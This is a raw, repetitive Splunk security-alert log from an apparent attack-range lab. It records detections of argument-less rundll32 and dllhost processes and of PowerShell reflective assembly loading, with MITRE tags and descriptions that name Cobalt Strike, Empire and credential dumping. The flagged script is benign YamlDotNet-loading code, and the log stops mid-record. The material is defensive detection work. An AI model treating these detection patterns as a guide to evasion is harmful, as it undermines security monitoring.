parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x35c0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x1b9c", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665006932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T20:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T20:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665006932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T20:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T20:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665006932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T20:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T20:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665006932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T20:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T20:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665000000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665000000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4580", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665000000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665000000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x11e4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="22024", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="14116", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5608", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4350", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", 